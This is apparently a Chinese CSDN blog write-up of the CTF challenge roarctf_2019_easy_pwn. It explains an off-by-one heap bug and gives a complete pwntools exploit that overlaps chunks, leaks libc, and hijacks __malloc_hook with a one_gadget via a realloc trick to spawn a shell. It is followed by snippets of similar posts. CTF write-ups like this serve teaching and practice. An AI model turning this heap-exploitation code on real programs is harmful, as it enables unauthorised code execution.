roarctf_2019_easy_pwn 1/100

已于 2022-02-23 19:31:56 修改
阅读量1.4k 收藏
点赞数
分类专栏: PWN 文章标签: 安全
于 2022-02-22 01:34:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123059506
版权

edit chunk的功能里 存在off_by_one漏洞。

利用思路:

构造堆块重叠

然后house of sprit。

exp:

from pwn import *
p = process("./roarctf_2019_easy_pwn")
e = ELF("./roarctf_2019_easy_pwn")
libc = e.libc
context.log_level = "debug"
p.timeout = 0.1
def add(size):
	p.recvuntil("./choice: ")
	p.sendline("1")
	p.recvuntil("size: ")
	p.sendline(str(size))
def edit(index,size,content):
	p.recvuntil("./choice: ")
	p.sendline("2")
	p.recvuntil("index ")
	p.sendline(str(index))
	p.recvuntil("size: ")
	p.sendline(str(size))
	p.recvuntil("content: ")
	p.sendline(content)
def  free(index):
	p.recvuntil("choice: ")
	p.sendline("3")
	p.recvuntil("index")
	p.sendline(str(index))
def show(index):
	p.recvuntil("choice: ")
	p.sendline("4")
	p.recvuntil("index ")
	p.sendline(str(index))

add(0x18)
add(0x18)
add(0x80)
add(0x10)
pl1 = "a"*(0x10) + p64(0x20) + p8(0x91)
edit(0,len(pl1)-1+10,pl1)
pl2 = "\x00"*(0x60) + p64(0x90) + p64(0x21) 
edit(2,len(pl2),pl2)
free(1)
add(0x80)
pl3 = "\x00"*(0x10) + p64(0) + p64(0x91)
edit(1,len(pl3),pl3)
free(2)
show(1)
arena_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success("arena_addr:"+hex(arena_addr))
libc_addr =  arena_addr - 0x3c4b78
log.success("libc_addr: "+hex(libc_addr))
add(0x60)
free(2)
malloc_hook = libc_addr + libc.sym["__malloc_hook"]
relloc_hook = libc_addr + libc.sym["__realloc_hook"]
realloc = libc_addr + libc.sym['realloc']
pl4 = "\x00"*(0x18) + p64(0x71) + p64(malloc_hook-0x23)
edit(1,len(pl4),pl4)
add(0x60)
add(0x60)
one = [0x45226,0x4527a,0xf03a4,0xf1247]
pl5 = "a"*(11) + p64(libc_addr+one[1]) + p64(realloc)
# pl5 = "a"*(0x13) + p64(libc_addr + one[3])
edit(4,len(pl5),pl5)
# gdb.attach(p)
add(0x10)
p.interactive()

tips:这道题再像之前一样修改 malloc_hook 为one_gadget 已经不行了,需要通过reallloc 来调整栈帧结构。

realloc函数执行时,不同于malloc和free,可以参考其汇编代码,他会先进行压栈操作,然后再执行realloc_hook,我们可以通过调整其偏移,来调整栈帧 0 2 4 6 8 11 12。

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnroarctf_2019_easy_pwn
Nothing
12-24 2080
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
roarctf_2019_easy_pwn
hanabi_sh
12-20 525
buuctf pwn roarctf_2019_easy_pwn off-by-one
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1112
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2245
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
1. "PWN.c":这很可能是 AVR 单片机的 C 语言源代码,实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt":这个文件可能是...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
1. C语言源代码:这部分代码可能负责设置定时器参数、初始化PWM接口以及根据应用需求调整占空比。 2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 ...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
最新发布
2301_79326813的博客
02-03 1401
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 556
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 341
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
buuoj刷题记录 - roarctf_2019_easy_pwn
qq_34010404的博客
03-17 193
检查一下保护: 拖进IDA分析程序: 问题处在write函数中, 最后可以溢出一个字节. 思路:溢出一个字节覆盖下一个chunk的prev in use标记位.然后向前合并,构造重叠chunk。 下面是我的构造方法: create三个这样的chunk free掉0 ,然后利用chunk1 覆盖掉chunk2的prev in use 标记位.同时在chunk1内布置好prev size.(glibc-2.23不会通过prev size 找到chunk ,然后比较前一个chunk的size,所以
21 07 27学习总结
eeeeeight的博客
07-29 180
21.07.27学习总结 Column: July 27, 2021 Tags: learning experience 前言: 前几天在忙xctf和拆笔记本电脑, 除了自己撸出一道ctb外, 没什么其它实际产出(因为装内核一直失败), 所以就没怎么写博客 06:00-08:00: buu刷题, roarctf_2019_easy_pwn版本下错了…然后捣腾了两个小时, 学到了realloc_hook写onegadget的方法 16:00-16:30: buu刷题: wustctf2020_getshell
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3011
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
pwnroarctf_2019_realloc_magic
Nothing
03-05 1004
例行检查 保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。 利用思路 1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠...
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值